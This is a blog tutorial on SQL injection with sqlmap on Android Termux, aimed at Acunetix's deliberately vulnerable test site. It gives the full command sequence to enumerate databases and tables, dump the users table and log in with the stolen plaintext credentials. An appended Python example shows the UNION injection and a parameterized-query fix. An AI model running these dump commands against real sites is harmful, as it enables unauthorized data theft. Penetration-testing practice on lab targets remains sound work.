Thursday, December 19, 2019

SQL injection penetration testing using sqlmap




sqlmap is an automated Linux and Windows based tool for finding SQL injection vulnerabilities.
Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking, like extracting database names, tables, columns, all the data in the tables, etc.

sqlmap is a powerful Python hacking tool that works well on all the Linux distros such as Parrot, Kali Linux, etc.


sqlmap is preinstalled in Kali Linux. If you want to install it manually, get it from GitHub. Simply use the command:




git clone https://github.com/sqlmapproject/sqlmap

sqlmap will now download in a few minutes.



Sqlmap in Linux




Sqlmap in Kali Linux



If it does not work, install the Python packages and try again. It works well with python2 in my case; see the above image.

  Usage

sqlmap has a huge number of options. You can see them with -h (basic help) and -hh (advanced help).

Now we'll see the practical use of sqlmap with a live example. For this, I am using Android, because of public demand, with Termux.

For this, we'll need Termux.



We are using Kali NetHunter in Termux for better usage.

Simply click on the link to learn how to install it if you still don't know how.

Now start Kali NetHunter in Termux and use the commands:
startkali
ls
cd sqlmap
ls
python2 sqlmap.py

The sqlmap interface will now be shown.

For the target we are using the Acunetix vulnweb test website, for understanding.

The login page looks like this:


Acunetix vulnerability login page


Now copy the page URL and paste it after --url in the command.

python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 8 --dbms mysql --dbs

If no id is present in the URL, use 1, or crawl the site to find pages with an id and use the URL of one of them.

Now we can see that a database named acuart is present, so we'll want to see what's in it.

Acunetix database


A database contains tables and columns that hold its information. That is what we are going to extract now.

First, we need to see what tables are inside this database. To see them, use the command:

python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 8 --dbms mysql --dbs -D acuart --tables

-D names the database to enumerate (--current-db is a switch that only reports which database the application is currently using, and it takes no value). Here we are asking for its tables, which look like this:

tables in database

Now we can see there are lots of tables containing information and credentials.
But we need the username and password, so we'll see what's in the table named 'users'.
Use this command to see the columns of table 'users':


python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 8 --dbms mysql --dbs -D acuart -T users --columns

The result will now show us the columns in table users.

tables and columns in database


Now we can see email, cc, uname, pass, etc.

Lots of juicy stuff over here.

We need to dump it now:

python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 8 --dbms mysql --dbs -D acuart -T users --dump


This command will dump all the credentials in Termux. For the sake of security, admins usually store passwords as hashes rather than plaintext, but sqlmap can also try to crack those hashes using a wordlist.

But for us, this time, it is in plaintext.😊

database credentials


Look at the separators very carefully and you'll see:

uname-test
pass-test

To test them, use them on the login page.

User credentials


We got a successful login, and the attack succeeded.😉


That's it with sqlmap and SQL injection.
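
Why the cat parameter was injectable, and the fix that stops the extraction shown above, as an added example that is not part of the original post or the test site's code. It assumes a constructed in-memory SQLite stand-in for the MySQL database; the products table and the function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the acuart database (SQLite in memory, not MySQL).
    # users/uname/pass come from the post; the products table is hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 1, 'poster'), (2, 2, 'print');
        INSERT INTO users VALUES ('test', 'test');
    """)
    return db

def list_products_vulnerable(db, cat):
    # The parameter is concatenated into the SQL text, so the database parses
    # anything the client sends as part of the statement.
    return db.execute("SELECT id, name FROM products WHERE cat = " + cat).fetchall()

def list_products_hardened(db, cat):
    # 1) Reject anything that is not the expected type (a small integer).
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        raise ValueError("cat must be a non-negative integer")
    # 2) Bind the value: a bound parameter is data and is never parsed as SQL.
    return db.execute("SELECT id, name FROM products WHERE cat = ?", (int(cat),)).fetchall()

def demo():
    db = make_db()
    # Constructed input of the UNION-query kind that automated tools submit.
    crafted = "1 UNION SELECT uname, pass FROM users"
    leaked = list_products_vulnerable(db, crafted)
    try:
        list_products_hardened(db, crafted)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected, list_products_hardened(db, "1")

if __name__ == "__main__":
    leaked, rejected, normal = demo()
    print("vulnerable handler returned:", leaked)
    print("hardened handler rejected crafted input:", rejected)
    print("hardened handler, cat=1:", normal)
```

The vulnerable handler returns the users row alongside the product row, while the hardened one rejects the crafted value and still serves cat=1 normally.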


I used Termux for Android because there are lots of tutorials for other Linux platforms, but Android users have very little information about how to use it. It works the same on all platforms, though, and works like a charm to find SQL injection.



stay blessed and happy hacking..
